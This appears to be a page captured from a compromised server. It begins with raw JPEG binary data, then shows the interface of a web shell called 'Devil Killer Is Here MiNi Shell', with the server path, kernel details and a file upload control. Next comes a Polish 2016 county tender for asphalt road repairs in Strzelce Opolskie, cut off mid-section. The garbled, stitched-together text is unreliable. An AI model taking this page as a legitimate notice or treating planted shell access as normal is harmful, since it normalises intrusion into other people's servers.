JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160125/16662-N-2016.html

<p class="kh_header"><b>Strzelce Opolskie: Remont cząstkowy nawierzchni bitumicznych dróg powiatowych Powiatu Strzeleckiego emulsją asfaltową i grysami z podziałem na część I i II</b><br>
<b>Numer ogłoszenia: 16662 - 2016; data zamieszczenia: 25.01.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Strzelecki , ul. Jordanowska 2, 47-100 Strzelce Opolskie, woj. opolskie, tel. 77 4401700;4401755, faks 77 4401701.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.powiatstrzelecki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont cząstkowy nawierzchni bitumicznych dróg powiatowych Powiatu Strzeleckiego emulsją asfaltową i grysami z podziałem na część I i II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie remontu cząstkowego nawierzchni bitumicznych przy użyciu grysów bazaltowych lub granitowych i kationowej emulsji asfaltowej szybko rozpadowej            K1-70 niemodyfikowanej na drogach powiatowych Powiatu Strzeleckiego. Zamówienie obejmuje wbudowanie łącznie 700 Mg materiału (grysu + emulsji) w ubytki nawierzchni dróg - w tym dróg miejskich oraz zamiejskich.

Zamówienie zostało podzielone na dwie części:
a)	Remont cząstkowy nawierzchni bitumicznych dróg powiatowych Powiatu Strzeleckiego emulsją asfaltową i grysami - część I
Część I (gm. Ujazd, gm. Leśnica, części gm. Strzelce Opolskie i części gm. Izbicko) - wbudowanie 370 Mg materiału:
-	Etap I - wbudowanie 250 Mg materiału;
-	Etap II - wbudowanie 120 Mg materiału;
b)	Remont cząstkowy nawierzchni bitumicznych dróg powiatowych Powiatu Strzeleckiego emulsją asfaltową i grysami - część II
Część II (gm. Jemielnica, gm. Kolonowskie, gm. Zawadzkie, części gm. Strzelce Opolskie i części gm. Izbicko) - wbudowanie 330 Mg materiału:
-	Etap I - wbudowanie 230 Mg materiału;
-	Etap II - wbudowanie 100 Mg materiału;

Zamawiający dopuszcza składania ofert częściowych. 


Część Nr I: Remont cząstkowy nawierzchni bitumicznych dróg powiatowych                     Powiatu Strzeleckiego emulsją asfaltową i grysami - część I.

Część I (gm. Ujazd, gm. Leśnica, części gm. Strzelce Opolskie i części gm. Izbicko) - wbudowanie 370 Mg materiału:
-	Etap I - wbudowanie 250 Mg materiału;
-	Etap II - wbudowanie 120 Mg materiału;

Zakres robót:
a)	oczyszczenie remontowanego miejsca sprężonym powietrzem z kurzu, luźnej ziemi i błota - (w przypadku mocnego zabrudzenia skropienie wodą i wydmuchanie błota)
b)	spryskanie emulsją asfaltową dna i krawędzi remontowanego miejsca
c)	wbudowanie pod wysokim ciśnieniem mieszanki grysu bazaltowego o frakcji w zależności od głębokości i powierzchni remontowanego miejsca z emulsją asfaltową
d)	wbudowanie pod wysokim ciśnieniem mieszanki warstwy ścieralnej
e)	zasypanie pod ciśnieniem remontowanego miejsca suchym grysem frakcji 2/5 mm
f)	zamiatanie - usunięcie luźnych grysów na terenie zabudowanym przy krawężniku.

Informacje dodatkowe:
1)	Wykonawca zobowiązany jest do zapewnienia bezpiecznych warunków ruchu drogowego kołowego i pieszego w rejonie prowadzonych robót objętych umową. Teren robót należy oznakować znakami A-14 roboty drogowe, B-33 ograniczenie prędkości i A-28 sypki żwir wraz z prawidłowym oznakowaniem pojazdu                    oraz zgodnie z zatwierdzonym projektem organizacji ruchu. Przedmiotowe oznakowanie tymczasowe związane z wykonywanymi robotami może zostać zdemontowane przez Wykonawcę wyłącznie w przypadku stwierdzenia, że luźny grys użyty w ramach robót nie zalega na jezdni, a tym samym droga może                    być użytkowana w sposób bezpieczny. Koszt wykonania projektu organizacji ruchu oraz oznakowania prac nie podlega odrębnej zapłacie i przyjmuje się, że jest włączony w cenę oferty.


2)	Zamawiający wymaga, aby zamówienie było realizowane co najmniej dwoma  remonterami jednocześnie - dotyczy zarówno części I jak i części II. Całkowicie  wyklucza  się   zastosowanie  innych  technologii. Wykonawca musi wykazać, że dysponuje lub będzie dysponował w/w sprzętem.
3)	Zamawiający wymaga, aby codzienne ważenie samochodów wraz z materiałem zarówno przed rozpoczęciem robót jak i po ich zakończeniu odbywało się na terenie Powiatu Strzeleckiego. Koszt wykonania ważenia nie podlega odrębnej zapłacie                 i przyjmuje się, że jest włączony w cenę oferty. Zamawiający ma prawo uczestniczyć podczas ważenia samochodu. Wykonawca będzie również dostarczał Zamawiającemu codziennie dokumenty z przeważenia samochodu.
4)	Zaleca się, aby Wykonawca dokonał wizji lokalnej terenu robót i jego otoczenia,               a także zdobył, na swoją własną odpowiedzialność i ryzyko, wszelkie dodatkowe informacje, które mogą być konieczne do przygotowania oferty oraz zawarcia umowy i wykonania zamówienia. Koszty dokonania wizji lokalnej terenu budowy poniesie Wykonawca.

Niezależnie od zakresu robót ujętego przedmiarem robót, wynagrodzenie ustalone                   w ofercie Wykonawcy  musi zawierać wszelkie koszty związane z:
1)	doprowadzeniem terenu po wykonaniu  robót do stanu pierwotnego,
2)	organizacją placu robót,
3)	ubezpieczeniem zadania,
4)	zabezpieczeniem robót pod  względem BHP.

Środki techniczne i organizacyjne zabezpieczające budowę oraz instruktaż pracowników przed rozpoczęciem budowy:
1)	W trakcie wykonywania robot należy stosować warunki techniczne wykonania robot, przepisy szczególne, normy itp.
2)	Roboty drogowe powinny być prowadzone pod nadzorem brygadzisty, który                 ma obowiązek organizowania, przygotowania i kierowania pracami brygady                     w sposób zabezpieczający przed wypadkiem zgodnie z obowiązującymi przepisami bezpieczeństwa i higieny pracy.
3)	Strefy niebezpieczne (miejsca niebezpieczne) należy odpowiednio oznakować                 i ogrodzić.
4)	Na placu budowy winny być wyznaczone miejsca składowania materiałów, winny być wykonane w sposób zabezpieczający przed możliwością wywrócenia, zsunięcia lub rozsunięcia.
5)	Technologia wykonania robót drogowych zgodnie z wymaganiami i wytycznymi poszczególnych rodzajów robót.
6)	Instruktaż bhp na stanowiskach pracy oraz o systemie powiadomienia                         przy zaistnieniu wypadku.
7)	W przypadku wystąpienia podwykonawców generalny wykonawca obowiązany jest do:
a)	pełnienia bezpośredniego nadzoru nad przestrzeganiem przepisów bezpieczeństwa i higieny pracy,
b)	egzekwowania od podwykonawców przestrzegania przepisów bezpiecznej pracy,
c)	określenia współpracy ze sobą wszystkich podwykonawców,
d)	wyznaczenia koordynatora sprawującego nadzór nad bezpieczeństwem                 i higieną pracy wszystkich pracowników,
e)	ustalenia zasad współdziałania w zakresie sposobów postępowania                  przy wystąpieniu zagrożeń dla zdrowia lub życia pracowników.
8)	Przed przystąpieniem do wykonywania robót drogowych należy opracować projekt organizacji ruchu drogowego na czas robót. Projekt musi przewidywać możliwość dojazdu na budowę i do przyległych zabudowań w przypadku pożaru, czy potrzeby niesienia pomocy. 
9)	Roboty prowadzić tylko przy oznakowaniu robót zgodnie z w/w projektem, zatwierdzonym przez organ zarządzający ruchem drogowym.
10)	Poinformować zainteresowane przedsiębiorstwa i instytucje oraz okolicznych mieszkańców o rozpoczęciu robót i związanych z tym utrudnieniach.
11)	W rejonie istniejącego uzbrojenia roboty należy prowadzić ręcznie i pod nadzorem użytkownika.
12)	Przy realizacji robót stosować standardowe zasady zabezpieczenia pracowników,  w tym środki ochrony osobistej.
13)	Maszyny i urządzenia techniczne oraz narzędzia zmechanizowane powinny                   być monitorowane, eksploatowane i obsługiwane zgodnie z instrukcją producenta.
14)	Maszyny i urządzenia techniczne podlegające dozorowi technicznemu muszą mieć dokumenty uprawniające do ich eksploatacji.
15)	Operatorzy maszyn powinni posiadać odpowiednie kwalifikacje.
16)	Wykonawca jest zobowiązany do ochrony przed uszkodzeniem lub zniszczeniem własności publicznej lub prywatnej. Jeżeli w związku z zaniedbaniem, niewłaściwym prowadzeniem robót lub brakiem koniecznych działań ze strony Wykonawcy nastąpi uszkodzenie lub zniszczenie własności publicznej lub prywatnej, to Wykonawca            na swój koszt naprawi lub odtworzy uszkodzoną własność. Stan naprawionej własności powinien być nie gorszy niż przed powstaniem uszkodzenia.


17)	W warunkach ograniczonej widoczności miejsca prowadzenia prac powinny                   być właściwie oświetlone.
Warunki gwarancyjne.
Wykonawca zobowiązany będzie udzielić na całość wykonanego przedmiotu zamówienia gwarancji, na opisanych poniżej warunkach.
1. Wykonawca udziela Zamawiającemu gwarancji na przedmiot umowy na okres                           24 miesięcy (licząc od daty przekazania przez Wykonawcę zamówienia i przyjęcia przez Zamawiającego jako należycie wykonanego).
2. Bieg okresu gwarancji i rękojmi rozpoczyna się:
a) w dniu następnym licząc od daty odbioru końcowego,
b) dla wymienianych materiałów wbudowanych w ramach umowy z dniem ich wymiany.
3. Zamawiający może dochodzić roszczeń z tytułu gwarancji na zasadach przewidzianych             w ustępach poprzedzających, także po okresie określonym w ust. 1, jeżeli zgłosił wadę przed upływem tego okresu.
4. Jeżeli Wykonawca nie usunie wad w terminie uzgodnionym z Zamawiającym,                                     to Zamawiający może zlecić usunięcie ich osobie trzeciej na koszt Wykonawcy.                                 W tym przypadku koszty usuwania wad będą pokrywane w pierwszej kolejności z zatrzymanej kwoty będącej zabezpieczeniem należytego wykonania umowy.  
5. Wykonawca najpóźniej w dniu podpisania umowy przekaże Zamawiającemu kartę gwarancyjną, zawierającą wszystkie warunki określone powyżej.

Zamawiający dopuszcza udzielenie Wykonawcy zamówień uzupełniających w trybie zamówienia         z wolnej ręki stanowiących nie więcej niż 50 % wartości zamówienia podstawowego dla części I.          

Zamawiający nie dopuszcza składania ofert wariantowych.

Nie zamierza się ustanawiać dynamicznego systemu zakupów.











Część Nr II: Remont cząstkowy nawierzchni bitumicznych dróg powiatowych                       Powiatu Strzeleckiego emulsją asfaltową i grysami - część II.

Część II (gm. Jemielnica, gm. Kolonowskie, gm. Zawadzkie, części gm. Strzelce Opolskie i części gm. Izbicko) - wbudowanie 330 Mg materiału:
-	Etap I - wbudowanie 230 Mg materiału;
-	Etap II - wbudowanie 100 Mg materiału;

Zakres robót:
a)	oczyszczenie remontowanego miejsca sprężonym powietrzem z kurzu, luźnej ziemi i błota - (w przypadku mocnego zabrudzenia skropienie wodą i wydmuchanie błota)
b)	spryskanie emulsją asfaltową dna i krawędzi remontowanego miejsca
c)	wbudowanie pod wysokim ciśnieniem mieszanki grysu bazaltowego o frakcji w zależności od głębokości i powierzchni remontowanego miejsca z emulsją asfaltową
d)	wbudowanie pod wysokim ciśnieniem mieszanki warstwy ścieralnej
e)	zasypanie pod ciśnieniem remontowanego miejsca suchym grysem frakcji 2/5 mm
f)	zamiatanie - usunięcie luźnych grysów na terenie zabudowanym przy krawężniku.

Informacje dodatkowe:
1)	Wykonawca zobowiązany jest do zapewnienia bezpiecznych warunków ruchu drogowego kołowego i pieszego w rejonie prowadzonych robót objętych umową. Teren robót należy oznakować znakami A-14 roboty drogowe, B-33 ograniczenie prędkości i A-28 sypki żwir wraz z prawidłowym oznakowaniem pojazdu                    oraz zgodnie z zatwierdzonym projektem organizacji ruchu. Przedmiotowe oznakowanie tymczasowe związane z wykonywanymi robotami może zostać zdemontowane przez Wykonawcę wyłącznie w przypadku stwierdzenia, że luźny grys użyty w ramach robót nie zalega na jezdni, a tym samym droga może                    być użytkowana w sposób bezpieczny. Koszt wykonania projektu organizacji ruchu oraz oznakowania prac nie podlega odrębnej zapłacie i przyjmuje się,                           że jest włączony w cenę oferty.
2)	Zamawiający wymaga, aby zamówienie było realizowane co najmniej dwoma  remonterami jednocześnie - dotyczy zarówno części I jak i części II. Całkowicie  wyklucza  się   zastosowanie  innych  technologii. Wykonawca musi wykazać, że dysponuje lub będzie dysponował w/w sprzętem.
3)	Zamawiający wymaga, aby codzienne ważenie samochodów wraz z materiałem zarówno przed rozpoczęciem robót jak i po ich zakończeniu odbywało się na terenie Powiatu Strzeleckiego. Koszt wykonania ważenia nie podlega odrębnej zapłacie                 i przyjmuje się, że jest włączony w cenę oferty. Zamawiający ma prawo uczestniczyć podczas ważenia samochodu. Wykonawca będzie również dostarczał Zamawiającemu codziennie dokumenty z przeważenia samochodu.
4)	Zaleca się, aby Wykonawca dokonał wizji lokalnej terenu robót i jego otoczenia,               a także zdobył, na swoją własną odpowiedzialność i ryzyko, wszelkie dodatkowe informacje, które mogą być konieczne do przygotowania oferty oraz zawarcia umowy i wykonania zamówienia. Koszty dokonania wizji lokalnej terenu budowy poniesie Wykonawca.

Niezależnie od zakresu robót ujętego przedmiarem robót, wynagrodzenie ustalone                   w ofercie Wykonawcy  musi zawierać wszelkie koszty związane z:
1)	doprowadzeniem terenu po wykonaniu  robót do stanu pierwotnego,
2)	organizacją placu robót,
3)	ubezpieczeniem zadania,
4)	zabezpieczeniem robót pod  względem BHP.

Środki techniczne i organizacyjne zabezpieczające budowę oraz instruktaż pracowników przed rozpoczęciem budowy:
1) W trakcie wykonywania robot należy stosować warunki techniczne wykonania robot, przepisy szczególne, normy itp.
2) Roboty drogowe powinny być prowadzone pod nadzorem brygadzisty, który ma obowiązek organizowania, przygotowania i kierowania pracami brygady w sposób zabezpieczający przed wypadkiem zgodnie z obowiązującymi przepisami bezpieczeństwa i higieny pracy.
3) Strefy niebezpieczne (miejsca niebezpieczne) należy odpowiednio oznakować  i ogrodzić.
4) Na placu budowy winny być wyznaczone miejsca składowania materiałów, winny być wykonane w sposób zabezpieczający przed możliwością wywrócenia, zsunięcia lub rozsunięcia.
5) Technologia wykonania robót drogowych zgodnie z wymaganiami i wytycznymi poszczególnych rodzajów robót.
6) Instruktaż bhp na stanowiskach pracy oraz o systemie powiadomienia przy zaistnieniu wypadku.
7) W przypadku wystąpienia podwykonawców generalny wykonawca obowiązany jest do:
a) pełnienia bezpośredniego nadzoru nad przestrzeganiem przepisów bezpieczeństwa i higieny pracy,
b) egzekwowania od podwykonawców przestrzegania przepisów bezpiecznej pracy,
c) określenia współpracy ze sobą wszystkich podwykonawców,
d) wyznaczenia koordynatora sprawującego nadzór nad bezpieczeństwem i higieną pracy wszystkich pracowników,
e) ustalenia zasad współdziałania w zakresie sposobów postępowania przy wystąpieniu zagrożeń dla zdrowia lub życia pracowników.

8) Przed przystąpieniem do wykonywania robót drogowych należy opracować projekt organizacji ruchu drogowego na czas robót. Projekt musi przewidywać możliwość dojazdu na budowę                   i do przyległych zabudowań w przypadku pożaru, czy potrzeby niesienia pomocy. 
9) Roboty prowadzić tylko przy oznakowaniu robót zgodnie z w/w projektem, zatwierdzonym              przez organ zarządzający ruchem drogowym.
10) Poinformować zainteresowane przedsiębiorstwa i instytucje oraz okolicznych mieszkańców               o rozpoczęciu robót i związanych z tym utrudnieniach.
11) W rejonie istniejącego uzbrojenia roboty należy prowadzić ręcznie i pod nadzorem użytkownika.
12) Przy realizacji robót stosować standardowe zasady zabezpieczenia pracowników,                               w tym środki ochrony osobistej.
13) Maszyny i urządzenia techniczne oraz narzędzia zmechanizowane powinny                                         być monitorowane, eksploatowane i obsługiwane zgodnie z instrukcją producenta.
14) Maszyny i urządzenia techniczne podlegające dozorowi technicznemu muszą mieć dokumenty uprawniające do ich eksploatacji.
15) Operatorzy maszyn powinni posiadać odpowiednie kwalifikacje.
16) Wykonawca jest zobowiązany do ochrony przed uszkodzeniem lub zniszczeniem własności publicznej lub prywatnej. Jeżeli w związku z zaniedbaniem, niewłaściwym prowadzeniem robót lub brakiem koniecznych działań ze strony Wykonawcy nastąpi uszkodzenie lub zniszczenie własności publicznej lub prywatnej, to Wykonawca na swój koszt naprawi lub odtworzy uszkodzoną własność. Stan naprawionej własności powinien być nie gorszy niż przed powstaniem uszkodzenia.
17) W warunkach ograniczonej widoczności miejsca prowadzenia prac powinny być właściwie oświetlone.

Warunki gwarancyjne.
Wykonawca zobowiązany będzie udzielić na całość wykonanego przedmiotu zamówienia gwarancji, na opisanych poniżej warunkach.
1. Wykonawca udziela Zamawiającemu gwarancji na przedmiot umowy na okres                           24 miesięcy (licząc od daty przekazania przez Wykonawcę zamówienia i przyjęcia                     przez Zamawiającego jako należycie wykonanego).
2. Bieg okresu gwarancji i rękojmi rozpoczyna się:
a) w dniu następnym licząc od daty odbioru końcowego,
b) dla wymienianych materiałów wbudowanych w ramach umowy z dniem ich wymiany.
3. Zamawiający może dochodzić roszczeń z tytułu gwarancji na zasadach przewidzianych             w ustępach poprzedzających, także po okresie określonym w ust. 1, jeżeli zgłosił wadę              przed upływem tego okresu.

4. Jeżeli Wykonawca nie usunie wad w terminie uzgodnionym z Zamawiającym,                                     to Zamawiający może zlecić usunięcie ich osobie trzeciej na koszt Wykonawcy.                         W tym przypadku koszty usuwania wad będą pokrywane w pierwszej kolejności z zatrzymanej kwoty będącej zabezpieczeniem należytego wykonania umowy.  
5. Wykonawca najpóźniej w dniu podpisania umowy przekaże Zamawiającemu kartę gwarancyjną, zawierającą wszystkie warunki określone powyżej.

Zamawiający dopuszcza udzielenie Wykonawcy zamówień uzupełniających w trybie zamówienia         z wolnej ręki stanowiących nie więcej niż 50 % wartości zamówienia podstawowego dla części II.          

Zamawiający nie dopuszcza składania ofert wariantowych.

Nie zamierza się ustanawiać dynamicznego systemu zakupów.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający dopuszcza udzielenie Wykonawcy zamówień uzupełniających w trybie zamówienia         z wolnej ręki stanowiących nie więcej niż 50 % wartości zamówienia podstawowego                     dla każdej części zamówienia zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6, 45.23.32.20-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.04.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga złożenia wadium na przedmiotowe zadanie w wysokości:
a) dla Części I:    2.200,00 zł;         
b) dla Części II:   2.000,00 zł.
2. Wadium może być wnoszone w jednej lub w kilku następujących formach:
	   1)  w pieniądzu:
- przelewem na rachunek Zamawiającego:
Bank Spółdzielczy w Leśnicy O/Strzelce Opolskie
ul. Gogolińska 2
47-100 Strzelce Opolskie
Nr 52 8907 1089 2002 0090 0007 0006
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)	gwarancjach bankowych;
4)	gwarancjach ubezpieczeniowych;
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
-	za datę wniesienia wadium w pieniądzu uważa się datę wpływu pieniędzy na konto        
      Zamawiającego;
3. Wadium wnosi się przed terminem składania ofert. Pełna kwota wadium musi znaleźć się na rachunku Zamawiającego przed upływem terminu składania ofert, tj. do dnia 09.02.2016 r. do godz. 10:00.
4. Wykonawca zostanie wykluczony z niniejszego postępowania jeżeli jego oferta przed upływem terminu do składania ofert, tj. do dnia 09.02.2016 r. do godz. 10:00 nie zostanie skutecznie zabezpieczona akceptowaną przez Zamawiającego formą wadium - w wymaganej wysokości.
5. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
6. Wadium wniesione w formie innej niż pieniądz należy złożyć w formie oryginału, razem                   z ofertą w osobnej kopercie</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I:
Zamawiający odstępuje od opisu sposobu dokonywania  oceny spełniania warunków             w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału                                 w postępowaniu, o którym mowa w pkt 6.IV.1 SIWZ.

Część II:
Zamawiający odstępuje od opisu sposobu dokonywania  oceny spełniania warunków             w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału                                 w postępowaniu, o którym mowa w pkt 6.IV.1 SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I:
Wykonawca musi posiadać doświadczenie polegające na wykonaniu (zakończeniu)                   co najmniej dwóch zadań w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, analogicznych                   do przedmiotu zamówienia tj. remontu cząstkowego emulsją asfaltową i grysami przy użyciu remontera na drogach publicznych kategorii co najmniej dróg powiatowych, których wartość jest nie mniejsza niż 132.000,00 zł brutto każdego z zadań,
 Uwaga: Jako wykonanie (zakończenie) zadania należy rozumieć podpisanie Protokołu   
 odbioru robót lub równoważnego dokumentu.

Część II:
Wykonawca musi posiadać doświadczenie polegające na wykonaniu (zakończeniu)                   co najmniej dwóch zadań w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, analogicznych                   do przedmiotu zamówienia tj. remontu cząstkowego emulsją asfaltową i grysami przy użyciu remontera na drogach publicznych kategorii co najmniej dróg powiatowych, których wartość jest nie mniejsza niż 118.000,00 zł brutto każdego z zadań,
 Uwaga: Jako wykonanie (zakończenie) zadania należy rozumieć podpisanie Protokołu   
 odbioru robót lub równoważnego dokumentu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I:
Wykonawca musi wykazać, iż posiada lub ma zapewniony dostęp (przez dzierżawę, wynajem, umowę kupna sprzedaży lub inny sposób) do niżej podanych, w pełni sprawnych jednostek sprzętu:
